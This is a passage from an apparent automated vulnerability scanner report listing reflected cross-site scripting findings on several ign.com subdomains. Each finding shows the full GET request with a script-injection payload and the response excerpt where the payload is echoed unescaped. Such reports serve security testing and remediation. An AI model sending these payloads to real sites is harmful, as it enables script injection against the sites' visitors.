Set-Cookie: NGUserID=a016c0a-24030-186224903-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:27 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043487871v-1n-12mc+1297043487871mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 94648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
coreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://games.ign.com/articles/114/1147934p1.html?b92fe"-alert(1)-"f38442978de=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.208. http://games.ign.com/articles/114/1147934p1.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.ign.com
Path:   /articles/114/1147934p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf573"><script>alert(1)</script>6d05b099dbb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/114/1147934p1.html?bf573"><script>alert(1)</script>6d05b099dbb=1 HTTP/1.1
Host: games.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-19918-53826951-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:25 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043486037v-1n-12mc+1297043486037mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 94725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://games.ign.com/articles/114/1147934p1.html?bf573"><script>alert(1)</script>6d05b099dbb=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.209. http://games.ign.com/ratings.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.ign.com
Path:   /ratings.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fa5c"-alert(1)-"77dfbb9df23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ratings.html?8fa5c"-alert(1)-"77dfbb9df23=1 HTTP/1.1
Host: games.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15004-1842023344-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:39 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043499536v-1n-12mc+1297043499536mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 109761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Ratings and Re
...[SNIP]...
if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://games.ign.com/ratings.html?8fa5c"-alert(1)-"77dfbb9df23=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.210. http://games.ign.com/ratings.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.ign.com
Path:   /ratings.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eae1"><script>alert(1)</script>279a1848484 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ratings.html?3eae1"><script>alert(1)</script>279a1848484=1 HTTP/1.1
Host: games.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-27586-335511075-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:36 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043496453v-1n-12mc+1297043496453mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 108099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Ratings and Re
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://games.ign.com/ratings.html?3eae1"><script>alert(1)</script>279a1848484=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.211. http://gear.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gear.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b863c"><script>alert(1)</script>fcd2abe112b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b863c"><script>alert(1)</script>fcd2abe112b=1 HTTP/1.1
Host: gear.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-18145-855949556-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:34 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043494206v-1n-12mc+1297043494206mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 143211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Gear: Previews
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://gear.ign.com/?b863c"><script>alert(1)</script>fcd2abe112b=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.212. http://gear.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gear.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75409"-alert(1)-"034fd7420f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?75409"-alert(1)-"034fd7420f0=1 HTTP/1.1
Host: gear.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-2993-879256091-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:38 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043498665v-1n-12mc+1297043498665mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 143002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Gear: Previews
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://gear.ign.com/?75409"-alert(1)-"034fd7420f0=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.213. http://gear.ign.com/articles/114/1147945p1.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gear.ign.com
Path:   /articles/114/1147945p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc7c9"><script>alert(1)</script>5f62f771290 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/114/1147945p1.html?bc7c9"><script>alert(1)</script>5f62f771290=1 HTTP/1.1
Host: gear.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-27586-1148740613-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:30 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043490358v-1n-12mc+1297043490358mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 102514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://gear.ign.com/articles/114/1147945p1.html?bc7c9"><script>alert(1)</script>5f62f771290=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.214. http://gear.ign.com/articles/114/1147945p1.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gear.ign.com
Path:   /articles/114/1147945p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ba9e"-alert(1)-"ed46ab3021e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/114/1147945p1.html?4ba9e"-alert(1)-"ed46ab3021e=1 HTTP/1.1
Host: gear.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-2993-1930050444-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:32 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043492260v-1n-12mc+1297043492260mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 102434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
scoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://gear.ign.com/articles/114/1147945p1.html?4ba9e"-alert(1)-"ed46ab3021e=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.215. http://guides.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c05a"-alert(1)-"dc219b0b059 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?9c05a"-alert(1)-"dc219b0b059=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:54:12 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-22919-721810951-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:54:12 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043653040v-1n-12mc+1297043653040mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 563591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://guides.ign.com/?9c05a"-alert(1)-"dc219b0b059=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.216. http://guides.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a5bc"><script>alert(1)</script>3d8e7077c65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4a5bc"><script>alert(1)</script>3d8e7077c65=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:54:05 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c08-31833-2109221874-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:54:05 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043645309v-1n-12mc+1297043645309mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 563668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/?4a5bc"><script>alert(1)</script>3d8e7077c65=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.217. http://guides.ign.com/guides/14235018/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/14235018/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47a84"><script>alert(1)</script>564c920195a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guides/14235018/?47a84"><script>alert(1)</script>564c920195a=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:49 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-13836-259185475-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:49 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043509360v-1n-12mc+1297043509360mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 101059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/guides/14235018/?47a84"><script>alert(1)</script>564c920195a=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.218. http://guides.ign.com/guides/14235018/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/14235018/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f02f6"-alert(1)-"f03fa2e9ceb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guides/14235018/?f02f6"-alert(1)-"f03fa2e9ceb=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:54 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-12684-1875560547-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:54 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043514177v-1n-12mc+1297043514177mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 100999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
peof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://guides.ign.com/guides/14235018/?f02f6"-alert(1)-"f03fa2e9ceb=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.219. http://guides.ign.com/guides/14293266/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/14293266/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc77b"-alert(1)-"9efbf2b5b8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guides/14293266/?cc77b"-alert(1)-"9efbf2b5b8b=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:41 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-23512-726416638-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:41 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043501702v-1n-12mc+1297043501702mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 95333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
peof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://guides.ign.com/guides/14293266/?cc77b"-alert(1)-"9efbf2b5b8b=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.220. http://guides.ign.com/guides/14293266/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/14293266/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53311"><script>alert(1)</script>b8a60daf5cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guides/14293266/?53311"><script>alert(1)</script>b8a60daf5cb=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:36 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c02-24874-1286270057-7;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:36 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043496552v-1n-12mc+1297043496552mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 95368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/guides/14293266/?53311"><script>alert(1)</script>b8a60daf5cb=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.221. http://guides.ign.com/guides/14341976/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/14341976/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a72d"-alert(1)-"d0fe4cf0b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guides/14341976/?2a72d"-alert(1)-"d0fe4cf0b4=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:58 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-27586-60180781-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:58 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043518742v-1n-12mc+1297043518742mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 96168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
